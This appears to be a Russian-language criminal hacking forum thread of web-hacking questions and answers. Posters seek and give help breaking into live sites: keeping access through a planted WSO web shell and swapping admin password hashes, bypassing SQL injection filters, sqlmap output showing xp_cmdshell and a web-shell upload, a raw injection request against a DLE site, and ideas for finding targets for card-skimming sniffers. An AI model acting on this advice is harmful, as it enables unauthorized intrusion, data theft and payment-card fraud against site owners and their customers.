Всем привет, ребят подскажите как обойти в burp suite, 403 forbidden.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Подскажите пожалуйста , была админка Opencrt залил туда шелл, шшел остался , а доступ к админке пропал , можно ли как то попасть в админку имея шшел, в данном случае это "wso", за раннее спасибо.
Да, можно. Посмотри в конфиге кредсы к БД, измени хэш пароля админа на свой, зайди, сделай что нужно, потом поставь обратно админский.
Ну или добавь свой акк с админскими правами.
тогда только брут, можно попробовать поискать еще багу, возможно, она будет с правами
Подсобите кто знает с sql injection.
1) стоит фильтр на нижнее подчеркивание, error based инъекция с выводом '_' заменяет на запятую table_name -> table,name и соответственно инъекция не раскручивается. Пробовал в url,hex, char. Последние два вызывают ошибки синтаксиса, хотя он правильный...
2) второе приложение error blind инъекция, возвращает сразу капсом и строчными. То есть таблица shy. Получаю в выводе sShHyY. Как понял стоит какая то защита сводящая все к одному регистру. Туплю не могу понять как обойти) Регистр важен
1) стоит фильтр на нижнее подчеркивание, error based инъекция с выводом '_' заменяет на запятую table_name -> table,name и соответственно инъекция не раскручивается. Пробовал в url,hex, char. Последние два вызывают ошибки синтаксиса, хотя он правильный...
2) второе приложение error blind инъекция, возвращает сразу капсом и строчными. То есть таблица shy. Получаю в выводе sShHyY. Как понял стоит какая то защита сводящая все к одному регистру. Туплю не могу понять как обойти) Регистр важен
Чем можно спарсить потенциальные таргеты для взлома и последующей установки сниффера
1) либо двойное url кодирование либо брут таблиц
2) не особо понял, если выводит, то уже сам редактируй под нужный формат.
1)Пробовал дабл, декодирует один раз(я что то делаю не так?))
2) Да, ты правильно понял, выводит в обоих регистрах. Эксплуатирую через intruder. Разница между правильным и не правильным ответом в размере этого ответа(инъекция blind error based) По итогу возвращает каждый символ в обоих регистрах(((( вместо paSword123 получаю pPaAsSwWoOrRdD123, а регистр в моем случае важен
Попробуй в hex вывод, может получится, нникогда не встречал такое.
hex(password) fro users
или например попробоват так
convert(password+using+latin1)
convert(password+using+binary)
Подскажите плиз, кто имел дело с
как там обстоят дела с заливкой шшела? И еще по поводу их хешей , получилось только самые простые пассы расшифровать. Поделитесь опытом плиз.
Код:
https://demo.sunshop.com/admin/login.php
Последнее редактирование:
database management system users privileges:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] BUILTIN\\Users
[*] DANISH\\Administrator
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQLSERVER
[*] NT SERVICE\\SQLTELEMETRY
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] sa
[13:26:25] [INFO] testing if current user is DBA
[13:26:26] [WARNING] reflective value(s) found and filtering out
[13:26:27] [INFO] testing if xp_cmdshell extended procedure is usable
[13:26:30] [INFO] xp_cmdshell extended procedure is usable
[13:26:30] [INFO] using PowerShell to write the text file content to file 'C:\intetpub\wwwroot\shell.aspx'
[13:26:31] [CRITICAL] page not found (404)
[13:26:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
[13:26:31] [WARNING] your sqlmap version is outdated
ребят дайте совет по том как права зафорсить или куда залить еще шелл если прав не хватает или как еще посоветуете действовать
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] BUILTIN\\Users
[*] DANISH\\Administrator
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQLSERVER
[*] NT SERVICE\\SQLTELEMETRY
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] sa
[13:26:25] [INFO] testing if current user is DBA
[13:26:26] [WARNING] reflective value(s) found and filtering out
[13:26:27] [INFO] testing if xp_cmdshell extended procedure is usable
[13:26:30] [INFO] xp_cmdshell extended procedure is usable
[13:26:30] [INFO] using PowerShell to write the text file content to file 'C:\intetpub\wwwroot\shell.aspx'
[13:26:31] [CRITICAL] page not found (404)
[13:26:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
[13:26:31] [WARNING] your sqlmap version is outdated
ребят дайте совет по том как права зафорсить или куда залить еще шелл если прав не хватает или как еще посоветуете действовать
Всем привет, окунь нашел запрос, выводящий ошибку mysql:
Ошибка выводится, но только в том случае, если titleonly = 1'", пытался пробовать разные значения, но только с этим появляется ошибка.
Мапа предполагала, что там Uninon query with 68 columns, но так и не раскрутила. Движок DLE, есть cloudflare, может знает кто, как попробовать раскрутить
POST /index.php?do=search HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: https://www.example.org/
Cookie: PHPSESSID=a05d08ae0664fd10d3bea7335a595463
Content-Length: 1354
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: www.example.org
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="do"
search
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="subaction"
search
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="search_start"
0
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="full_search"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="result_from"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="story"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="titleonly"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="searchuser"
xsjyBldb
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="replyless"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="replylimit"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="searchdate"
30
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="beforeafter"
before
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="sortby"
category
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="resorder"
asc
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="showposts"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="catlist[]"
30
------------YWJkMTQzNDcw--
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: https://www.example.org/
Cookie: PHPSESSID=a05d08ae0664fd10d3bea7335a595463
Content-Length: 1354
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: www.example.org
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="do"
search
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="subaction"
search
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="search_start"
0
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="full_search"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="result_from"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="story"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="titleonly"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="searchuser"
xsjyBldb
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="replyless"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="replylimit"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="searchdate"
30
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="beforeafter"
before
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="sortby"
category
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="resorder"
asc
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="showposts"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="catlist[]"
30
------------YWJkMTQzNDcw--
Попробуй error based с оператором if(условие, если верно возвращает 1''', если нет возвращает валидную строку)
баг приложения: регистрация подтверждается через Whatsapp. Выбирая страну при регистрации вводишь номер другой страны с такими же символами в начале номера(пример -- usa&canada +1......). несмотря на то, что при регистрации указана одна страна, а по факту номер на whatsapp другой страны, тебе приходит код подтверждения.
Является ли это критическим багом для сервиса?
Есть ли смысл в данном случае работать с ними по схеме багбаунти или продать на форумах?
П.С. если важно, то сервис позиционирует себя как децентрализованная экосистема(WEB3)
*Также кого интересуют подобные логичекие ошибки приложений, в частности в мире децентрализованных финансов - открыт для обсуждения лично
Является ли это критическим багом для сервиса?
Есть ли смысл в данном случае работать с ними по схеме багбаунти или продать на форумах?
П.С. если важно, то сервис позиционирует себя как децентрализованная экосистема(WEB3)
*Также кого интересуют подобные логичекие ошибки приложений, в частности в мире децентрализованных финансов - открыт для обсуждения лично
Вряд ли ты сможешь продать логическую ошибку, которая базируется не на деньгах....на форумах такое вряд ли купят.
Можешь попробовать написать им и надеяться на какие-нибудь ништяки, ну на это процентов 30....остальное, просто пофиксят а тебя оставят с носом. Пригрозить ещё чем-нибудь могут, чтобы ты не злился на них
уже фиксанули, меня побрили, как ты и сказал)
это я на опыте, тоже пытался так делать, правда вулны посерьёзнее
нужно приходить и брать то что твоё по праву
полностью согласен, благодарю за конкретный совет, впредь буду действовать практичнее, успехов тебе на твоих вулнах!это я на опыте, тоже пытался так делать, правда вулны посерьёзнее
нужно приходить и брать то что твоё по праву
БЕРЕМ ТО, ЧТО НАШЕ ПО ПРАВУВсем привет, может кто-нибудь подскажет, пробовал найти админку в опенкарте, через фаззинг патхов/поддоменов, посмотрел robots.txt. Ничего не помогло, может есть какой-то альтернативный вариант? Есть скуля, но по таблицам ничего существенного не нашёл.
okadminfinder3 сначала лучше этим опробовать, а вдруг
dirb, потом можно брутануть админку в директории, а так же бы поискал бы в субдомене